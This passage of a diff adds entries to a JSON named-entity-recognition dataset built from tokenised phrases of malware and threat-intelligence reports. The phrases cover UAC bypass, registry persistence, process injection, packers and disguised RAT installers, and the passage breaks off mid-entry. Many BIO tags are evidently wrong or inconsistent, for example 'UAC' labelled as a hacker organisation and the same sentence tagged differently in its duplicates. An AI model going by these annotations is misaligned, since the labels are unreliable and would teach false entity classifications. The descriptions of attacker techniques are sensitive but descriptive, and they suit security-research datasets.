+ "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "including", + "adding", + "more", + "command-line", + "arguments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "also", + "supports", + "command-line", + "arguments," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "we", + "discovered", + "several", + "tools", + "used", + "for", + "UAC", + "bypass", + "in", + "Windows", + "10." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HackTool.Win32.ABPASS", + "is", + "a", + "tool", + "used", + "to", + "bypass", + "UAC", + "in", + "Windows", + "10." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HackTool.Win32.CCPASS", + "is", + "another", + "tool", + "that", + "is", + "also", + "used", + "for", + "Windows", + "10", + "UAC", + "bypass" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "This", + "service", + "has", + "the", + "highest", + "privileges", + "that", + "can", + "be", + "abused", + "for", + "Windows", + "10", + "UAC", + "bypass." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "UAC", + "bypass", + "will", + "be", + "executed", + "via", + "the", + "AppInfo", + "RPC", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "UAC", + "Bypass", + "via", + "the", + "CMSTPLUA", + "COM", + "interface" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UAC", + "Bypass", + "via", + "the", + "AppInfo", + "RPC", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UAC", + "bypass", + "will", + "be", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UAC", + "bypass", + "is", + "executed", + "via", + "token", + "manipulation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UAC", + "bypass", + "is", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "net", + "user", + "<username>" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "the", + "following", + "data", + "is", + "written", + "into", + "registry:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Registry", + "keys", + "changed" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "creates", + "a", + "new", + "Shell", + "in", + "the", + "registry." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "installs", + "itself", + "to", + "%programdata%", + "and", + "then", + "sets", + "the", + "registry", + "run", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "invokes", + "the", + "undocumented", + "API", + "UserAssocSet", + "to", + "update", + "the", + "file", + "association." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "strings", + "and", + "the", + "APIs", + "used", + "by" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "installs", + "itself", + "by", + "creating", + "an", + "InstallSvc", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "creating", + "aservice", + "called", + "InstallSvc" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Creates", + "a", + "service" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "injected", + "to", + "conduct", + "backdoor", + "behaviors." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "inject", + "it", + "into", + "winver.exe", + "for", + "the", + "next-stage", + "payload" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "will", + "read", + "the", + "next", + "stage", + "payloads,", + "free.plg", + "and", + "main.plg,", + "and", + "inject", + "them", + "into", + "dllhost.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "It", + "is", + "also", + "able", + "to", + "communicate", + "through", + "different", + "network", + "protocols", + "such", + "as", + "UDP", + "(User", + "Datagram", + "Protocol)", + "and", + "TCP", + "(Transmission", + "Control", + "Protocol)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Delete", + "file" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "Delete", + "file" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "Keystrokes", + "and", + "windows", + "monitoring" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Monitor", + "keystrokes", + "and", + "windows" + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "will", + "check", + "if", + "the", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "will", + "check", + "if", + "the", + "process", + "avp.exe", + "exists." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "It", + "sets", + "up", + "a", + "run", + "key", + "for", + "via", + "the", + "command", + "C:\\ProgramData\\GoogleUpdate\\googleupdate.exe", + "work", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "sets", + "up", + "a", + "run", + "key", + "for", + "the", + "command", + "C:\\programdata\\netsky\\netsky.exe", + "online", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sets", + "Run", + "Key", + "with", + "“work/online”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "installs", + "itself", + "by", + "creating", + "aservice", + "called", + "InstallSvc", + "which", + "will", + "trigger", + "“C:\\programdata\\netsky\\netsky.exe", + "online”." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "first", + "generates", + "a", + "key", + "blob", + "randomly,", + "with", + "the", + "key", + "being", + "encrypted", + "in", + "a", + "custom", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Regardless", + "of", + "whether", + "the", + "file", + "content", + "is", + "compressed", + "or", + "not,", + "it", + "will", + "be", + "encrypted", + "in", + "XOR", + "operations", + "with", + "a", + "specific", + "string" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "another", + "example", + "of", + "custom", + "malware", + "used", + "for", + "packing", + "files;" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Victims", + "will", + "receive", + "and", + "interact", + "with", + "a", + "decoy", + "document", + "containing", + "a", + "Google", + "Drive", + "link", + "and", + "a", + "corresponding", + "password", + "instead", + "of", + "an", + "archive", + "download", + "link", + "embedded", + "in", + "the", + "email." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Victims", + "will", + "receive", + "and", + "interact", + "with", + "a", + "decoy", + "document", + "containing", + "a", + "Google", + "Drive", + "link", + "and", + "a", + "corresponding", + "password", + "instead", + "of", + "an", + "archive", + "download", + "link", + "embedded", + "in", + "the", + "email." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "that", + "had", + "the", + "remote", + "desktop", + "service", + "enabled." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "the", + "creation", + "of", + "a", + "schedule", + "task." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "conceal", + "its", + "true", + "code", + "through", + "either", + "encryption", + "or", + "compression" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "make", + "the", + "malicious", + "payload", + "smaller", + "and", + "avoid", + "detection", + "based", + "on", + "static", + "malware", + "analysis", + "techniques" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPX", + "is", + "an", + "open-source", + "packing", + "algorithm" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MPRESS", + "is", + "a", + "free", + "packer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andromeda", + "is", + "a", + "custom", + "packer" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "compress", + "(and", + "if", + "it", + "has", + "the", + "functionality", + "of", + "a", + "crypter", + "also", + "encrypts)", + "the", + "original", + "executable,", + "which", + "is", + "saved", + "in", + "one", + "of", + "the", + "sections", + "of", + "the", + "final", + "packed", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "entry", + "point", + "of", + "the", + "original", + "file", + "is", + "relocated,", + "and", + "so", + "is", + "the", + "Import", + "Address", + "Table", + "(IAT)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "change", + "the", + "final", + "payload’s", + "section", + "names," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "very", + "few", + "imports", + "as", + "they", + "don’t", + "rely", + "on", + "external", + "libraries" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "allocate", + "memory,", + "change", + "permissions,", + "read", + "the", + "encrypted/packed", + "chunk", + "of", + "code,", + "decrypt", + "it,", + "load", + "it", + "to", + "the", + "allocated", + "memory", + "space", + "and", + "execute", + "it" + ], + "ner_tags": [ + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "system", + "calls" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VirtualAlloc", + "used", + "for", + "allocating", + "memory", + "in", + "the", + "current", + "process" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VirtualProtect", + "changes", + "the", + "permissions", + "of", + "the", + "given", + "virtual", + "address." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RtlDecompressBuffer", + "decompresses", + "the", + "provided", + "buffer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreateProcessInternalW", + "creates", + "a", + "new", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "create", + "a", + "new", + "threat", + "with", + "the", + "malicious", + "unpacked", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "initial", + "code", + "usually", + "called", + "a", + "stub,", + "decrypts", + "or", + "decompresses", + "the", + "real", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stub", + "is", + "a", + "small", + "part", + "of", + "code", + "that", + "implements", + "the", + "decompression", + "(and", + "decryption)", + "of", + "the", + "originally", + "packed", + "file" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "payload", + "of", + "the", + "malware", + "can", + "be", + "part", + "of", + "the", + "loader’s", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "strongly", + "indicates", + "that", + "it", + "contains", + "another", + "component", + "that", + "is", + "dropped/loaded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "can", + "be", + "downloaded", + "from", + "a", + "remote", + "location", + "(by", + "the", + "loader,", + "also", + "known", + "as", + "a", + "Downloader)." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "use", + "system", + "calls" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VirtualAlloc", + "used", + "for", + "allocating", + "memory", + "in", + "the", + "current", + "process" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VirtualProtect", + "changes", + "the", + "permissions", + "of", + "the", + "given", + "virtual", + "address" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RtlDecompressBuffer", + "decompresses", + "the", + "provided", + "buffer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreateProcessInternalW", + "creates", + "a", + "new", + "process" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "not", + "see", + "them", + "in", + "the", + "imported", + "function", + "list,", + "and", + "they", + "not", + "even", + "be", + "part", + "of", + "the", + "strings", + "in", + "the", + "sample." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "try", + "to", + "hide", + "these", + "system", + "calls" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "function", + "and", + "the", + "corresponding", + "library", + "are", + "dynamically", + "loaded", + "at", + "runtime", + "–", + "also", + "known", + "as", + "explicit", + "linking" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "executable", + "then", + "downloads", + "and", + "executes", + "additional", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "executable", + "binary", + "insecurely", + "downloads", + "and", + "executes", + "additional", + "payloads", + "from", + "the", + "Internet." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downloading", + "and", + "running", + "further", + "executables" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "downloads", + "and", + "runs", + "an", + "executable", + "payload" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "is", + "a", + "Windows", + "Native", + "Binary", + "executable", + "embedded", + "inside", + "of", + "UEFI", + "firmware", + "binary" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "Windows", + "executable", + "is", + "embedded", + "into", + "UEFI", + "firmware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + "Windows", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "embedded", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "executable", + "uses", + "the", + "Windows", + "Native", + "API" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool" + ] + }, + { + "tokens": [ + "It", + "then", + "sets", + "registry", + "entries" + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "to", + "run", + "this", + "executable", + "as", + "a", + "Windows", + "Service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "when", + "using", + "the", + "HTTPS-enabled", + "options" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "implants", + "made", + "their", + "native", + "Windows", + "executables", + "look", + "like", + "legitimate", + "update", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Windows", + "payload", + "was", + "named", + "“IntelUpdater.exe”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Capturing", + "screenshots" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Real-time", + "screen", + "monitoring" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "legitimate", + "tool", + "which", + "is", + "frequently", + "used", + "by", + "bad", + "actors", + "for", + "malicious", + "purposes", + "in", + "ways", + "similar", + "to", + "TeamViewer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NetSupport", + "Manager,", + "used", + "maliciously", + "or", + "otherwise,", + "provides", + "full", + "and", + "complete", + "control", + "over", + "the", + "target", + "device." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "NetSupport", + "Manager", + "is", + "a", + "legitimate", + "tool", + "that", + "has", + "a", + "long", + "history", + "of", + "development,", + "it", + "is", + "highly", + "attractive", + "to", + "attackers", + "as", + "it", + "can", + "be", + "relied", + "on", + "to", + "work", + "‘out", + "of", + "the", + "box’." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "been", + "observed", + "in", + "multiple", + "ISO", + "files", + "masquerading", + "as", + "legitimate", + "software," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "RAT", + "installation", + "is", + "disguised", + "to", + "look", + "similar", + "to", + "a", + "Google", + "Chrome", + "installation." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RAT", + "installer", + "disguised", + "as", + "Google", + "Chrome", + "setup" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "are", + "able", + "to", + "masquerade", + "the", + "dropper", + "or", + "installer" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "sample", + "is", + "obfuscated", + "via", + "the", + "Babadeda", + "crypter." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "a", + "base64", + "encoded", + "string", + "is", + "used", + "to", + "specify", + "various", + "parameters" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "Base64", + "encoded", + "RAT", + "execution", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Persistence", + "for", + "the", + "RAT", + "is", + "achieved", + "via", + "registry", + "entry,", + "and", + "a", + "shortcut", + "to", + "the", + "installed", + "RAT", + "executable", + "is", + "written", + "to", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Persistence", + "via", + "Scheduled", + "Task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "addition,", + "the", + "sample", + "generates", + "a", + "scheduled", + "task", + "with", + "multiple", + "triggers." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Network", + "adapter", + "details", + "are", + "pulled", + "via", + "GetAdaptersAddresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Additional", + "data", + "is", + "gleaned", + "via", + "WMI", + "queries" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SELECT", + "*", + "FROM", + "Win32_ComputerSystem" + ], + "ner_tags": [ + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "all", + "running", + "processes", + "are", + "enumerated", + "and", + "logged", + "via", + "EnumProcesses", + "(32-bit", + "processes)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "the", + "ability", + "to", + "drop", + "and", + "execute", + "additional", + "components." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "These", + "files", + "are", + "all", + "self-deleted", + "after", + "launch" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "using", + "this", + "tool", + "are", + "very", + "quick", + "to", + "update", + "their", + "lures", + "and", + "find", + "ways", + "to", + "entice", + "their", + "victims", + "into", + "installing", + "the", + "malicious", + "remote", + "control", + "software." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decoded", + "command" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Downloads", + "the", + "miner", + "and", + "watcher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "a", + "malware", + "downloader", + "is", + "uploaded", + "to", + "the", + "device" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reconfigures", + "Windows", + "Defender", + "to", + "exclude", + "the", + "user", + "profile", + "path", + "and", + "the", + "entire", + "system", + "drive", + "from", + "scanning." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "“intelligent”", + "way", + "of", + "brute", + "forcing:", + "it", + "checks", + "the", + "prompt", + "and,", + "based", + "on", + "the", + "prompt,", + "it", + "selects", + "the", + "appropriate", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "method", + "speeds", + "up", + "the", + "brute", + "forcing", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“intelligent", + "brute", + "forcing”" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "determines", + "the", + "processor", + "architecture" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Is", + "able", + "to", + "steal/gather", + "information", + "on", + "CPU", + "type,", + "screen", + "resolution" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "downloading", + "of", + "the", + "actual", + "malware", + "is", + "done", + "via", + "a", + "variety", + "of", + "possible", + "commands", + "(for", + "example,", + "wget,", + "curl,", + "tftp", + "and", + "ftpget)." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "via", + "the", + "shell", + "“echo”", + "commands." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keystroke" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "download", + "a", + "malicious", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "a", + "malicious", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JavaScript", + "is", + "the", + "module", + "that", + "has", + "to", + "be", + "manually", + "executed", + "by", + "the", + "victim," + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zip", + "archive" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "comes", + "with", + "an", + "embedded", + "PE", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PE", + "is", + "stored", + "as", + "a", + "Base64", + "encoded", + "string" + ], + "ner_tags": 